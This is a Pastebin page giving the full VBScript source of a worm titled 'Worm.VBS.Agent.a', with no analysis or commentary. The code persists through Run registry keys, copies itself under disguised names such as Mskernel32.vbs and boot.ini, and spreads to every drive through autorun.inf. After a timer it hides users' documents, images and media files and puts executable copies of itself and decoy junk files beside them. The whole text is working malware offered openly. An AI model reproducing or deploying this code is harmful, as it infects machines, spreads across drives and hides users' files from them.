API tools faq
paste
Advertisement
FlyFar

Worm.VBS.Agent.a - Source Code

FlyFar
Jun 13th, 2023
1,175
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 9.60 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. 'Debugger
  2. Dim fso, fs, exp, dc, dx, dr, f1, winpath, rg, atr, source, wintmp, head, drv, msc, pic, msg, exc
  3. Set fso = CreateObject("scripting.filesystemobject")
  4. Set rg = CreateObject("wscript.shell")
  5. Set winpath = fso.GetSpecialFolder(0)
  6. Set fs = fso.OpenTextFile(wscript.scriptfullname)
  7.     head = fs.ReadLine
  8.     source = fs.ReadAll
  9. Set drv = fso.Drives
  10.     dc = drv.Count
  11. msg = "Hack by Debugger !!!"
  12. pic = "???? JFIF   d d  ?? Ducky     F  ?? Adobe d?   ?? ? "
  13. msc = "ZQ!7????$f????(???�H2???o????-???%3[????o??_?k??|?.P?PyU 5g?w???+lr&??d??5.?MVlk????Xqk???l?Xg?l?|???"
  14. atr = "[autorun]" & vbCrLf & "shellexecute=wscript.exe Mskernel32.vbs"
  15. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", "0"
  16. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL", winpath & "\Mskernel32.vbs"
  17. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32TMP", wintmp & "\Mskernel32.vbs"
  18. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot", "wscript.exe " & winpath & "\boot.ini"
  19. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\boottmp", "wscript.exe " & wintmp & "\boot.ini"
  20. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 0, "REG_DWORD"
  21. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", 1, "REG_DWORD"
  22. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
  23. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1"
  24. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1"
  25. If head = "'Debug" Then
  26.    rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
  27. End If
  28. Do
  29. Remain
  30. Set wintmp = fso.GetSpecialFolder(2)
  31. If Not fso.FileExists(wintmp & "\" & "Mskernel32.vbs") Then
  32.    Set fs = fso.CreateTextFile(wintmp & "\" & "Mskernel32.vbs")
  33.        fs.Write ("'Debuger" & vbCrLf & source)
  34.        fs.Close
  35. End If
  36. If Not fso.FileExists(wintmp & "\" & "boot.ini") Then
  37.    Set fs = fso.CreateTextFile(wintmp & "\" & "boot.ini")
  38.        fs.Write ("'Debuger" & vbCrLf & source)
  39.        fs.Close
  40.    Else
  41.     Set fs = fso.GetFile(wintmp & "\" & "boot.ini")
  42.         fs.Attributes = 32
  43.     Set fs = fso.CreateTextFile(wintmp & "\" & "boot.ini")
  44.         fs.Write ("'Debuger" & vbCrLf & source)
  45.         fs.Close
  46.     Set fs = fso.GetFile(wintmp & "\" & "boot.ini")
  47.         fs.Attributes = 39
  48. End If
  49. Set winpath = fso.GetSpecialFolder(0)
  50. If Not fso.FileExists(winpath & "\" & "Mskernel32.vbs") Then
  51.    Set fs = fso.CreateTextFile(winpath & "\" & "Mskernel32.vbs")
  52.        fs.Write ("'Debuger" & vbCrLf & source)
  53.        fs.Close
  54. End If
  55. If Not fso.FileExists(winpath & "\" & "boot.ini") Then
  56.    Set fs = fso.CreateTextFile(winpath & "\" & "boot.ini")
  57.        fs.Write ("'Debuger" & vbCrLf & source)
  58.        fs.Close
  59.    Else
  60.     Set fs = fso.GetFile(winpath & "\" & "boot.ini")
  61.         fs.Attributes = 32
  62.     Set fs = fso.CreateTextFile(winpath & "\" & "boot.ini")
  63.         fs.Write ("'Debuger" & vbCrLf & source)
  64.         fs.Close
  65.     Set fs = fso.GetFile(winpath & "\" & "boot.ini")
  66.         fs.Attributes = 39
  67.    
  68. End If
  69. Set fs = fso.GetFile(wintmp & "\" & "Mskernel32.vbs")
  70.     fs.Attributes = 39
  71. Set fs = fso.GetFile(wintmp & "\" & "boot.ini")
  72.     fs.Attributes = 39
  73. Set fs = fso.GetFile(winpath & "\" & "Mskernel32.vbs")
  74.     fs.Attributes = 39
  75. Set fs = fso.GetFile(winpath & "\" & "boot.ini")
  76.     fs.Attributes = 39
  77.     For Each dr In fso.Drives
  78.        If dx = dc Then
  79.           dx = 0
  80.        End If
  81.        If dr.Path <> "A:" Then
  82.              If Not fso.FileExists(dr.Path & "\" & "Mskernel32.vbs") Then
  83.                 Set fs = fso.CreateTextFile(dr.Path & "\" & "Mskernel32.vbs")
  84.                     fs.Write ("'Debug" & vbCrLf & source)
  85.                     fs.Close
  86.              End If
  87.              If Not fso.FileExists(dr.Path & "\" & "autorun.inf") Then
  88.                 Set fs = fso.CreateTextFile(dr.Path & "\" & "autorun.inf")
  89.                     fs.Write (atr)
  90.                     fs.Close
  91.              Else
  92.                 Set fs = fso.GetFile(dr.Path & "\" & "autorun.inf")
  93.                     fs.Attributes = 32
  94.                 Set fs = fso.CreateTextFile(dr.Path & "\" & "autorun.inf")
  95.                     fs.Write (atr)
  96.                     fs.Close
  97.              End If
  98.              Set fs = fso.GetFile(dr.Path & "\" & "Mskernel32.vbs")
  99.                  fs.Attributes = 39
  100.              Set fs = fso.GetFile(dr.Path & "\" & "autorun.inf")
  101.                  fs.Attributes = 39
  102.                 rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", "0"
  103.                 rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL", winpath & "\Mskernel32.vbs"
  104.                 rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32TMP", wintmp & "\Mskernel32.vbs"
  105.                 rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot", "wscript.exe /E:vbs " & winpath & "\boot.ini"
  106.                 rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\boottmp", "wscript.exe /E:vbs " & wintmp & "\boot.ini"
  107.                 rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 0, "REG_DWORD"
  108.                 rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", 1, "REG_DWORD"
  109.                 rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
  110.                 rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1"
  111.                 rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1"
  112.              If exp = Empty Then
  113.                 Remain
  114.              End If
  115.              If exp = "exp" Then
  116.                 FolderList (dr.Path)
  117.              End If
  118.        End If
  119.        dx = dx + 1
  120.     Next
  121.     If dx = dc And exp <> 0 Then
  122.        wscript.sleep 10000
  123.     End If
  124. Loop Until dx > dc
  125. Sub FolderList(FolderSpec)
  126. On Error Resume Next
  127. Dim f, sf, path_list
  128. Set f = fso.GetFolder(FolderSpec)
  129. Set sf = f.SubFolders
  130.     path_list = f.Path
  131.     FileList (path_list)
  132.     For Each f1 In sf
  133.         path_list = f1.Path
  134.         FileList (path_list)
  135.         FolderList (path_list)
  136.     Next
  137. End Sub
  138. Sub FileList(FolderSpec)
  139. On Error Resume Next
  140. Dim f2, f3, ext, bs, nf, bsn
  141. Set f = fso.GetFolder(FolderSpec)
  142. Set f2 = f.Files
  143.     For Each f3 In f2
  144.         ext = fso.GetExtensionName(f3.Path)
  145.         bsn = fso.GetBaseName(f3.Path)
  146.         bs = Right(bsn, 1)
  147.         ext = LCase(ext)
  148.         If ext = "xls" Or ext = "doc" Or ext = "ppt" Or ext = "pdf" Then
  149.            If bs <> " " Then
  150.               f3.Attributes = 39
  151.               Set nf = fso.CreateTextFile(f.Path & "\" & bsn & " " & "." & ext)
  152.                   nf.Write (msg)
  153.                   nf.Close
  154.               Set nf = fso.CreateTextFile(f.Path & "\" & bsn & ".exe")
  155.                   nf.Write (source)
  156.               Set nf = fso.GetFile(f.Path & "\" & bsn & ".exe")
  157.                   nf.Attributes = 35
  158.            End If
  159.         End If
  160.         If exc = "true" Then
  161.            If ext = "jpg" Or ext = "bmp" Or ext = "ico" Or ext = "gif" Or ext = "emf" Then
  162.               If bs <> " " Then
  163.                  f3.Attributes = 39
  164.                  Set nf = fso.CreateTextFile(f.Path & "\" & bsn & " " & "." & ext)
  165.                      nf.Write (pic)
  166.                      nf.Close
  167.                  Set nf = fso.CreateTextFile(f.Path & "\" & bsn & ".exe")
  168.                      nf.Write (source)
  169.                      nf.Close
  170.                  Set nf = fso.GetFile(f.Path & "\" & bsn & ".exe")
  171.                      nf.Attributes = 35
  172.               End If
  173.            End If
  174.            If ext = "mp3" Or ext = "wav" Or ext = "mp4" Or ext = "3gp" Or ext = "avi" Or ext = "dat" Or ext = "wmv" Then
  175.               If bs <> " " Then
  176.                  f3.Attributes = 39
  177.                  Set nf = fso.CreateTextFile(f.Path & "\" & bsn & " " & "." & ext)
  178.                      nf.Write (msc)
  179.                      nf.Close
  180.                  Set nf = fso.CreateTextFile(f.Path & "\" & bsn & ".exe")
  181.                      nf.Write (source)
  182.                      nf.Close
  183.                  Set nf = fso.GetFile(f.Path & "\" & bsn & ".exe")
  184.                      nf.Attributes = 35
  185.               End If
  186.            End If
  187.         End If
  188.     Next
  189. End Sub
  190. Sub Remain()
  191. On Error Resume Next
  192. Dim tm, rm, last, d, dd
  193. Set fso = CreateObject("scripting.filesystemobject")
  194. Set wintmp = fso.GetSpecialFolder(2)
  195.     tm = Date
  196.     d = CDbl(Date)
  197. If Not fso.FileExists(wintmp & "\" & "SystemTime.log") Then
  198.    Set rm = fso.CreateTextFile(wintmp & "\" & "SystemTime.log")
  199.        rm.Write (d)
  200.        rm.Close
  201.    Set rm = fso.GetFile(wintmp & "\" & "SystemTime.log")
  202.        rm.Attributes = 39
  203. Else
  204.    Set rm = fso.OpenTextFile(wintmp & "\" & "SystemTime.log")
  205.        last = rm.ReadAll
  206.        dd = CDbl(last)
  207.        rm.Close
  208. End If
  209. If dd = Empty Then
  210.    Remain
  211. End If
  212. If dd <> Empty Then
  213.   If dd > 0 Then
  214.     If dd + 30 < d Then
  215.        exp = "exp"
  216.     Else
  217.        exp = "con"
  218.     End If
  219.     If dd + 60 < d Then
  220.        exc = "true"
  221.     Else
  222.        exc = "false"
  223.     End If
  224.   End If
  225. End If
  226. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!